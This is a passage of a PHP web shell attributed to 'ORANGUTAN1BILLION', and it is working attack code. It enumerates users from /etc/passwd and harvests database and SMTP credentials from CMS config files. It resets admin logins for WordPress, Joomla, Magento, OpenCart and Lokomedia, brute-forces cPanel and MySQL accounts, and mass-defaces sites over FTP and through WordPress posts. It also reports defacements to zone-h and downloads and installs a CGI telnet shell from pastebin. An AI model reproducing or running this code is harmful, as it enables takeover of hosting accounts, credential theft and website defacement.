787.     } else {
788.         echo "<pre>";
789.         $etc = fopen("/etc/passwd", "r") or die("<font color=white>Can't read /etc/passwd</font>");
790.         while($passwd = fgets($etc)) {
791.             if($passwd == '' || !$etc) {
792.                 echo "<font color=white>Can't read /etc/passwd</font>";
793.             } else {
794.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
795.                 foreach($user_jumping[1] as $user_idx_jump) {
796.                     $user_jumping_dir = "/home/$user_idx_jump/public_html";
797.                     if(is_readable($user_jumping_dir)) {
798.                         $i++;
799.                         $jrw = "[<font color=white>R</font>] <a href='?dir=$user_jumping_dir'><font color=white>$user_jumping_dir</font></a>";
800.                         if(is_writable($user_jumping_dir)) {
801.                             $jrw = "[<font color=white>RW</font>] <a href='?dir=$user_jumping_dir'><font color=white>$user_jumping_dir</font></a>";
802.                         }
803.                         echo $jrw;
804.                         if(function_exists('posix_getpwuid')) {
805.                             $domain_jump = file_get_contents("/etc/named.conf");   
806.                             if($domain_jump == '') {
807.                                 echo " => ( <font color=white>Can't get domain</font> )<br>";
808.                             } else {
809.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
810.                                 foreach($domains_jump[1] as $dj) {
811.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
812.                                     $user_jumping_url = $user_jumping_url['name'];
813.                                     if($user_jumping_url == $user_idx_jump) {
814.                                         echo " => ( <u>$dj</u> )<br>";
815.                                         break;
816.                                     }
817.                                 }
818.                             }
819.                         } else {
820.                             echo "<br>";
821.                         }
822.                     }
823.                 }
824.             }
825.         }
826.         if($i == 0) {
827.         } else {
828.             echo "<br>Total ".$i." in ".$ip;
829.         }
830.         echo "</pre>";
831.     }
832.     echo "</div>";
833. } elseif($_GET['do'] == 'auto_edit_user') {
834.     if($_POST['hajar']) {
835.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
836.             echo "Username or password must be longer than 6 characters";
837.         } else {
838.             $user_baru = $_POST['user_baru'];
839.             $pass_baru = md5($_POST['pass_baru']);
840.             $conf = $_POST['config_dir'];
841.             $scan_conf = scandir($conf);
842.             foreach($scan_conf as $file_conf) {
843.                 if(!is_file("$conf/$file_conf")) continue;
844.                 $config = file_get_contents("$conf/$file_conf");
845.                 if(preg_match("/JConfig|joomla/",$config)) {
846.                     $dbhost = ambilkata($config,"host = '","'");
847.                     $dbuser = ambilkata($config,"user = '","'");
848.                     $dbpass = ambilkata($config,"password = '","'");
849.                     $dbname = ambilkata($config,"db = '","'");
850.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
851.                     $prefix = $dbprefix."users";
852.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
853.                     $db = mysql_select_db($dbname);
854.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
855.                     $result = mysql_fetch_array($q);
856.                     $id = $result['id'];
857.                     $site = ambilkata($config,"sitename = '","'");
858.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
859.                     echo "Config => ".$file_conf."<br>";
860.                     echo "CMS => Joomla<br>";
861.                     if($site == '') {
862.                         echo "Sitename => <font color=white>Can't get domain</font><br>";
863.                     } else {
864.                         echo "Sitename => $site<br>";
865.                     }
866.                     if(!$update OR !$conn OR !$db) {
867.                         echo "Status => <font color=white>".mysql_error()."</font><br><br>";
868.                     } else {
869.                         echo "Status => <font color=white>Edit successfully, please login with the new user and password</font><br><br>";
870.                     }
871.                     mysql_close($conn);
872.                 } elseif(preg_match("/WordPress/",$config)) {
873.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
874.                     $dbuser = ambilkata($config,"DB_USER', '","'");
875.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
876.                     $dbname = ambilkata($config,"DB_NAME', '","'");
877.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
878.                     $prefix = $dbprefix."users";
879.                     $option = $dbprefix."options";
880.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
881.                     $db = mysql_select_db($dbname);
882.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
883.                     $result = mysql_fetch_array($q);
884.                     $id = $result[ID];
885.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
886.                     $result2 = mysql_fetch_array($q2);
887.                     $target = $result2[option_value];
888.                     if($target == '') {
889.                         $url_target = "Login => <font color=white>Can't get domain</font><br>";
890.                     } else {
891.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
892.                     }
893.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
894.                     echo "Config => ".$file_conf."<br>";
895.                     echo "CMS => Wordpress<br>";
896.                     echo $url_target;
897.                     if(!$update OR !$conn OR !$db) {
898.                         echo "Status => <font color=white>".mysql_error()."</font><br><br>";
899.                     } else {
900.                         echo "Status => <font color=white>Edit successfully, please login with the new user and password</font><br><br>";
901.                     }
902.                     mysql_close($conn);
903.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
904.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
905.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
906.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
907.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
908.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
909.                     $prefix = $dbprefix."admin_user";
910.                     $option = $dbprefix."core_config_data";
911.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
912.                     $db = mysql_select_db($dbname);
913.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
914.                     $result = mysql_fetch_array($q);
915.                     $id = $result[user_id];
916.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
917.                     $result2 = mysql_fetch_array($q2);
918.                     $target = $result2[value];
919.                     if($target == '') {
920.                         $url_target = "Login => <font color=white>Can't get domain</font><br>";
921.                     } else {
922.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
923.                     }
924.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
925.                     echo "Config => ".$file_conf."<br>";
926.                     echo "CMS => Magento<br>";
927.                     echo $url_target;
928.                     if(!$update OR !$conn OR !$db) {
929.                         echo "Status => <font color=white>".mysql_error()."</font><br><br>";
930.                     } else {
931.                         echo "Status => <font color=white>Edit successfully, please login with the new user and password</font><br><br>";
932.                     }
933.                     mysql_close($conn);
934.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
935.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
936.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
937.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
938.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
939.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
940.                     $prefix = $dbprefix."user";
941.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
942.                     $db = mysql_select_db($dbname);
943.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
944.                     $result = mysql_fetch_array($q);
945.                     $id = $result[user_id];
946.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
947.                     if($target == '') {
948.                         $url_target = "Login => <font color=white>Can't get domain</font><br>";
949.                     } else {
950.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
951.                     }
952.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
953.                     echo "Config => ".$file_conf."<br>";
954.                     echo "CMS => OpenCart<br>";
955.                     echo $url_target;
956.                     if(!$update OR !$conn OR !$db) {
957.                         echo "Status => <font color=white>".mysql_error()."</font><br><br>";
958.                     } else {
959.                         echo "Status => <font color=white>Edit successfully, please login with the new user and password</font><br><br>";
960.                     }
961.                     mysql_close($conn);
962.                 } elseif(preg_match("/Call function of validation xss and injection/",$config)) {
963.                     $dbhost = ambilkata($config,'server = "','"');
964.                     $dbuser = ambilkata($config,'username = "','"');
965.                     $dbpass = ambilkata($config,'password = "','"');
966.                     $dbname = ambilkata($config,'database = "','"');
967.                     $prefix = "users";
968.                     $option = "identitas";
969.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
970.                     $db = mysql_select_db($dbname);
971.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
972.                     $result = mysql_fetch_array($q);
973.                     $target = $result[alamat_website];
974.                     if($target == '') {
975.                         $target2 = $result[url];
976.                         $url_target = "Login => <font color=white>Can't get domain</font><br>";
977.                         if($target2 == '') {
978.                             $url_target2 = "Login => <font color=white>Can't get domain</font><br>";
979.                         } else {
980.                             $cek_login3 = file_get_contents("$target2/adminweb/");
981.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
982.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
983.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
984.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
985.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
986.                             } else {
987.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=white>Can't get admin page for login</font> ]<br>";
988.                             }
989.                         }
990.                     } else {
991.                         $cek_login = file_get_contents("$target/adminweb/");
992.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
993.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
994.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
995.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
996.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
997.                         } else {
998.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=white>Can't get admin page for login</font> ]<br>";
999.                         }
1000.                     }
1001.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
1002.                     echo "Config => ".$file_conf."<br>";
1003.                     echo "CMS => Lokomedia<br>";
1004.                     if(preg_match('/Cant get domain/', $url_target)) {
1005.                         echo $url_target2;
1006.                     } else {
1007.                         echo $url_target;
1008.                     }
1009.                     if(!$update OR !$conn OR !$db) {
1010.                         echo "Status => <font color=white>".mysql_error()."</font><br><br>";
1011.                     } else {
1012.                         echo "Status => <font color=white>Edit successfully, please login with the new user and password</font><br><br>";
1013.                     }
1014.                     mysql_close($conn);
1015.                 }
1016.             }
1017.         }
1018.     } else {
1019.     echo "<center>";
1020.     echo "<br>";
1021.     echo "<b><font color=white>AUTO EDIT USER CONFIG</b></font>";
1022.     echo "<br>";
1023.     echo "<br>";
1024.         echo "<center>
1025.         <form method='post'>
1026.         <font color=white>DIR Config:</font><br>
1027.         <input type='text' size='58' name='config_dir' value='$dir'><br><br>
1028.         <font color=white>Set User & Pass:</font> <br>
1029.         <input type='text' name='user_baru' size='58' placeholder='new_username'><br>
1030.         <input type='text' name='pass_baru' size='58' placeholder='new_password'><br>
1031.         <input type='submit' name='hajar' value='SMASH!' style='width: 452px;'>
1032.         </form>
1033.         <font color=white><span>( i ) : It works if you running in config ( ex: /home/user/public_html/folder_config )</span></font><br>
1034.         ";
1035.     }
1036. } elseif($_GET['do'] == 'cpanel') {
1037.     if($_POST['crack']) {
1038.         $usercp = explode("\r\n", $_POST['user_cp']);
1039.         $passcp = explode("\r\n", $_POST['pass_cp']);
1040.         $i = 0;
1041.         foreach($usercp as $ucp) {
1042.             foreach($passcp as $pcp) {
1043.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
1044.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1045.                     } else {
1046.                         $_SESSION[$ucp] = "1";
1047.                         $_SESSION[$pcp] = "1";
1048.                         if($ucp == '' || $pcp == '') {
1049.                            
1050.                         } else {
1051.                             $i++;
1052.                             if(function_exists('posix_getpwuid')) {
1053.                                 $domain_cp = file_get_contents("/etc/named.conf"); 
1054.                                 if($domain_cp == '') {
1055.                                     $dom =  "<font color=white>Can't get domain</font>";
1056.                                 } else {
1057.                                     preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1058.                                     foreach($domains_cp[1] as $dj) {
1059.                                         $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1060.                                         $user_cp_url = $user_cp_url['name'];
1061.                                         if($user_cp_url == $ucp) {
1062.                                             $dom = "<a href='http://$dj/' target='_blank'><font color=white>$dj</font></a>";
1063.                                             break;
1064.                                         }
1065.                                     }
1066.                                 }
1067.                             } else {
1068.                                 $dom = "<font color=white>Function is disable by system</font>";
1069.                             }
1070.                             echo "username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>) domain ($dom)<br>";
1071.                         }
1072.                     }
1073.                 }
1074.             }
1075.         }
1076.         if($i == 0) {
1077.         } else {
1078.             echo "<br>Success ".$i." Cpanel by <font color=white>ORANGUTAN1BILLION.</font>";
1079.         }
1080.     } else {
1081.     echo "<center>";
1082.     echo "<br>";
1083.     echo "<b><font color=white>CPANEL CRACK</b></font>";
1084.     echo "<br>";
1085.     echo "<br>
1086.         <form method='post'>
1087.         <font color=white>User: </font><br>
1088.         <textarea style='width: 450px; height: 100px;' name='user_cp'>";
1089.         $_usercp = fopen("/etc/passwd","r");
1090.         while($getu = fgets($_usercp)) {
1091.             if($getu == '' || !$_usercp) {
1092.                 echo "<font color=white>Can't read /etc/passwd</font>";
1093.             } else {
1094.                 preg_match_all("/(.*?):x:/", $getu, $u);
1095.                 foreach($u[1] as $user_cp) {
1096.                         if(is_dir("/home/$user_cp/public_html")) {
1097.                             echo "$user_cp\n";
1098.                     }
1099.                 }
1100.             }
1101.         }
1102.         echo "</textarea><br>
1103.         <font color=white>Pass: </font><br>
1104.         <textarea style='width: 450px; height: 100px;' name='pass_cp'>";
1105.         function cp_pass($dir) {
1106.             $pass = "";
1107.             $dira = scandir($dir);
1108.             foreach($dira as $dirb) {
1109.                 if(!is_file("$dir/$dirb")) continue;
1110.                 $ambil = file_get_contents("$dir/$dirb");
1111.                 if(preg_match("/WordPress/", $ambil)) {
1112.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1113.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1114.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
1115.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1116.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1117.                 } elseif(preg_match("/Call function of validation xss and injection/", $ambil)) {
1118.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
1119.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1120.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1121.                 } elseif(preg_match("/^[client]$/", $ambil)) {
1122.                     preg_match("/password=(.*?)/", $ambil, $pass1);
1123.                     if(preg_match('/"/', $pass1[1])) {
1124.                         $pass1[1] = str_replace('"', "", $pass1[1]);
1125.                         $pass .= $pass1[1]."\n";
1126.                     } else {
1127.                         $pass .= $pass1[1]."\n";
1128.                     }
1129.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1130.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1131.                 }
1132.             }
1133.             echo $pass;
1134.         }
1135.         $cp_pass = cp_pass($dir);
1136.         echo $cp_pass;
1137.         echo "</textarea><br>
1138.         <input type='submit' name='crack' style='width: 450px; height=200px;' value='CRACK'>
1139.         </form>
1140.         <span><font color=white>( i ) : CPanel crack has auto get password, so it works if you running in config ( ex: /home/user/public_html/folder_config )</span><br></center></font>";
1141.     }
1142. } elseif($_GET['do'] == 'cpftp_auto') {
1143.     if($_POST['crack']) {
1144.         $usercp = explode("\r\n", $_POST['user_cp']);
1145.         $passcp = explode("\r\n", $_POST['pass_cp']);
1146.         $i = 0;
1147.         foreach($usercp as $ucp) {
1148.             foreach($passcp as $pcp) {
1149.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
1150.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
1151.                     } else {
1152.                         $_SESSION[$ucp] = "1";
1153.                         $_SESSION[$pcp] = "1";
1154.                         if($ucp == '' || $pcp == '') {
1155.                             //
1156.                         } else {
1157.                             echo "[+] username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>)<br>";
1158.                             $ftp_conn = ftp_connect($ip);
1159.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
1160.                             if((!$ftp_login) || (!$ftp_conn)) {
1161.                                 echo "[+] <font color=white>Login failed</font><br><br>";
1162.                             } else {
1163.                                 echo "[+] <font color=white>Login success</font><br>";
1164.                                 $fi = htmlspecialchars($_POST['file_deface']);
1165.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
1166.                                 if($deface) {
1167.                                     $i++;
1168.                                     echo "[+] <font color=white>Deface success</font><br>";
1169.                                     if(function_exists('posix_getpwuid')) {
1170.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
1171.                                         if($domain_cp == '') {
1172.                                             echo "[+] <font color=white>Can't get domain</font><br><br>";
1173.                                         } else {
1174.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
1175.                                             foreach($domains_cp[1] as $dj) {
1176.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
1177.                                                 $user_cp_url = $user_cp_url['name'];
1178.                                                 if($user_cp_url == $ucp) {
1179.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
1180.                                                     break;
1181.                                                 }
1182.                                             }
1183.                                         }
1184.                                     } else {
1185.                                         echo "[+] <font color=white>Can't get domain</font><br><br>";
1186.                                     }
1187.                                 } else {
1188.                                     echo "[-] <font color=white>Deface failed</font><br><br>";
1189.                                 }
1190.                             }
1191.                             //echo "username (<font color=white>$ucp</font>) password (<font color=white>$pcp</font>)<br>";
1192.                         }
1193.                     }
1194.                 }
1195.             }
1196.         }
1197.         if($i == 0) {
1198.         } else {
1199.             echo "<br>Deface success ".$i." Cpanel by <font color=white>ORANGUTAN1BILLION.</font>";
1200.         }
1201.     } else {
1202.     echo "<br>";
1203.     echo "<b><center><font color=white>CPANEL / FTP AUTO DEFACE</b></center></font>";
1204.     echo "<br>";
1205.     echo "<br>";
1206.         echo "<center>
1207.         <form method='post'>
1208.         <font color=white>Filename: <br>
1209.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
1210.         <font color=white>Defaced Page: <br>
1211.         <input type='text' name='deface' placeholder='http://www.defaced-site.com/your_file.php' style='width: 450px;'><br><br>
1212.         <font color=white>USER: <br>
1213.         <textarea style='width: 450px; height: 100px;' name='user_cp'>";
1214.         $_usercp = fopen("/etc/passwd","r");
1215.         while($getu = fgets($_usercp)) {
1216.             if($getu == '' || !$_usercp) {
1217.                 echo "<font color=white>Can't read /etc/passwd</font>";
1218.             } else {
1219.                 preg_match_all("/(.*?):x:/", $getu, $u);
1220.                 foreach($u[1] as $user_cp) {
1221.                         if(is_dir("/home/$user_cp/public_html")) {
1222.                             echo "$user_cp\n";
1223.                     }
1224.                 }
1225.             }
1226.         }
1227.         echo "</textarea><br>
1228.         <font color=white>PASS: <br>
1229.         <textarea style='width: 450px; height: 100px;' name='pass_cp'>";
1230.         function cp_pass($dir) {
1231.             $pass = "";
1232.             $dira = scandir($dir);
1233.             foreach($dira as $dirb) {
1234.                 if(!is_file("$dir/$dirb")) continue;
1235.                 $ambil = file_get_contents("$dir/$dirb");
1236.                 if(preg_match("/WordPress/", $ambil)) {
1237.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
1238.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
1239.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
1240.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
1241.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
1242.                 } elseif(preg_match("/Call fucntion of validation xss and injection/", $ambil)) {
1243.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
1244.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
1245.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
1246.                 } elseif(preg_match("/client/", $ambil)) {
1247.                     preg_match("/password=(.*)/", $ambil, $pass1);
1248.                     if(preg_match('/"/', $pass1[1])) {
1249.                         $pass1[1] = str_replace('"', "", $pass1[1]);
1250.                         $pass .= $pass1[1]."\n";
1251.                     }
1252.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
1253.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
1254.                 }
1255.             }
1256.             echo $pass;
1257.         }
1258.         $cp_pass = cp_pass($dir);
1259.         echo $cp_pass;
1260.         echo "</textarea><br>
1261.         <input type='submit' name='crack' style='width: 450px;' value='SMASH!'><br><br>
1262.         </form>
1263.         <span><font color=white>( i ) : CPanel crack has auto get password, so it works if you running in config ( ex: /home/user/public_html/folder_config )</span><br></center></font>";
1264.     }
1265. } elseif($_GET['do'] == 'smtp') {
1266.     echo "<center>";
1267.     echo "<br>";
1268.     echo "<b><font color=white>SMTP GRABBER</b></font>";
1269.     echo "<br>";
1270.     echo "<br>";
1271.     echo "<span><font color=white>( i ) : CPanel crack has auto get password, so it works if you running in config ( ex: /home/user/public_html/folder_config )</span><br></center></font><br>";
1272.     function scj($dir) {
1273.         $dira = scandir($dir);
1274.         foreach($dira as $dirb) {
1275.             if(!is_file("$dir/$dirb")) continue;
1276.             $ambil = file_get_contents("$dir/$dirb");
1277.             $ambil = str_replace("$", "", $ambil);
1278.             if(preg_match("/JConfig|joomla/", $ambil)) {
1279.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
1280.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
1281.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
1282.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
1283.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
1284.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
1285.                 echo "<font color=white>SMTP Host: $smtp_host</font><br>";
1286.                 echo "<font color=white>SMTP port: $smtp_port</font><br>";
1287.                 echo "<font color=white>SMTP user: $smtp_user</font><br>";
1288.                 echo "<font color=white>SMTP pass: $smtp_pass</font><br>";
1289.                 echo "<font color=white>SMTP auth: $smtp_auth</font><br>";
1290.                 echo "<font color=white>SMTP secure: $smtp_secure</font><br><br>";
1291.                
1292.             }
1293.         }
1294.     }
1295.     $smpt_hunter = scj($dir);
1296.     echo $smpt_hunter;
1297. } elseif($_GET['do'] == 'auto_wp') {
1298.     if($_POST['hajar']) {
1299.         $title = htmlspecialchars($_POST['new_title']);
1300.         $pn_title = str_replace(" ", "-", $title);
1301.         if($_POST['cek_edit'] == "Y") {
1302.             $script = $_POST['edit_content'];
1303.         } else {
1304.             $script = $title;
1305.         }
1306.         $conf = $_POST['config_dir'];
1307.         $scan_conf = scandir($conf);
1308.         foreach($scan_conf as $file_conf) {
1309.             if(!is_file("$conf/$file_conf")) continue;
1310.             $config = file_get_contents("$conf/$file_conf");
1311.             if(preg_match("/WordPress/", $config)) {
1312.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
1313.                 $dbuser = ambilkata($config,"DB_USER', '","'");
1314.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
1315.                 $dbname = ambilkata($config,"DB_NAME', '","'");
1316.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
1317.                 $prefix = $dbprefix."posts";
1318.                 $option = $dbprefix."options";
1319.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
1320.                 $db = mysql_select_db($dbname);
1321.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
1322.                 $result = mysql_fetch_array($q);
1323.                 $id = $result[ID];
1324.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
1325.                 $result2 = mysql_fetch_array($q2);
1326.                 $target = $result2[option_value];
1327.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
1328.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
1329.                 echo "<div style='margin: 5px auto;'>";
1330.                 if($target == '') {
1331.                     echo "URL: <font color=white>Can't get domain</font> -> ";
1332.                 } else {
1333.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
1334.                 }
1335.                 if(!$update OR !$conn OR !$db) {
1336.                     echo "<font color=white>MySQL Error: ".mysql_error()."</font><br>";
1337.                 } else {
1338.                     echo "<font color=white>Change successfully</font><br>";
1339.                 }
1340.                 echo "</div>";
1341.                 mysql_close($conn);
1342.             }
1343.         }
1344.     } else {
1345.     echo "<br>";
1346.     echo "<center><b><font color=white>AUTO EDIT TITLE + CONTENT WORDPRESS</b></center></font>";
1347.     echo "<br>";
1348.         echo "<center>
1349.         <form method='post'>
1350.         <font color=white>DIR Config: <br>
1351.         <input type='text' size='58' name='config_dir' value='$dir'><br><br>
1352.         <font color=white>Set Title: <br>
1353.         <input type='text' name='new_title' size='58' value='Hacked by ORANGUTAN1BILLION' placeholder='New Title'><br><br>
1354.         <font color=white>Edit content? <input type='radio' name='cek_edit' value='Y' checked>YES<input type='radio' name='cek_edit' value='N'>NO<br><br>
1355.         <span><font color=white>( YES ) Put your deface script, ( NO ) Don't put anything in</span><br>
1356.         <textarea name='edit_content' placeholder='Example http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
1357.         <input type='submit' name='hajar' value='SMASH!' style='width: 450px;'><br><br>
1358.         </form>
1359.         <span><span>( i ) : It works if you running in config ( ex: /home/user/public_html/folder_config )</span><br>
1360.         ";
1361.     }
1362. } elseif($_GET['do'] == 'zoneh') {
1363.     if($_POST['submit']) {
1364.         $domain = explode("\r\n", $_POST['url']);
1365.         $nick =  $_POST['nick'];
1366.        
1367.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
1368.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
1369.         function zoneh($url,$nick) {
1370.             $ch = curl_init("http://www.zone-h.com/notify/single");
1371.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
1372.                   curl_setopt($ch, CURLOPT_POST, true);
1373.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
1374.             return curl_exec($ch);
1375.                   curl_close($ch);
1376.         }
1377.         foreach($domain as $url) {
1378.             $zoneh = zoneh($url,$nick);
1379.             if(preg_match("/color=\"white\">OK<\/font><\/li>/i", $zoneh)) {
1380.                 echo "$url -> <font color=white>OK</font><br>";
1381.             } else {
1382.                 echo "$url -> <font color=white>ERROR</font><br>";
1383.             }
1384.         }
1385.     } else {
1386.             echo "<center>";
1387.     echo "<br>";
1388.     echo "<b><font color=white>ZONE-H</b></font>";
1389.     echo "<br>";
1390.     echo "<br>";
1391.         echo "<center><form method='post'>
1392.         <font color=white>Defacer:</font> <br>
1393.         <input type='text' name='nick' size='58' value='ORANGUTAN1BILLION'><br><br>
1394.         <font color=white>Domains:</font> <br>
1395.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
1396.         <input type='submit' name='submit' value='SMASH!' style='width: 450px;'>
1397.         </form>";
1398.     }
1399.     echo "</center>";
1400. } elseif($_GET['do'] == 'cgi') {
1401.     echo "<br>";
1402.     echo "<b><center><font color=white>CGI TELNET</center></b></font>";
1403.     echo "<br>";
1404.     echo "<br>";
1405.     $cgi_dir = mkdir('idx_cgi', 0755);
1406.     $file_cgi = "idx_cgi/cgi.izo";
1407.     $isi_htcgi = "AddHandler cgi-script .izo";
1408.     $htcgi = fopen(".htaccess", "w");
1409.     fwrite($htcgi, $isi_htcgi);
1410.     fclose($htcgi);
1411.     $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
1412.     $cgi = fopen($file_cgi, "w");
1413.     fwrite($cgi, $cgi_script);
1414.     fclose($cgi);
1415.     chmod($file_cgi, 0755);
1416.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
1417. } elseif($_GET['do'] == 'fake_root') {
1418.     ob_start();
1419.     $cwd = getcwd();
1420.     $ambil_user = explode("/", $cwd);
1421.     $user = $ambil_user[2];
1422.     if($_POST['reverse']) {
1423.         $site = explode("\r\n", $_POST['url']);
1424.         $file = $_POST['file'];
1425.         foreach($site as $url) {
1426.             $cek = getsource("$url/~$user/$file");
1427.             if(preg_match("/hacked/i", $cek)) {
1428.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=white>Fake Root!</font><br>";
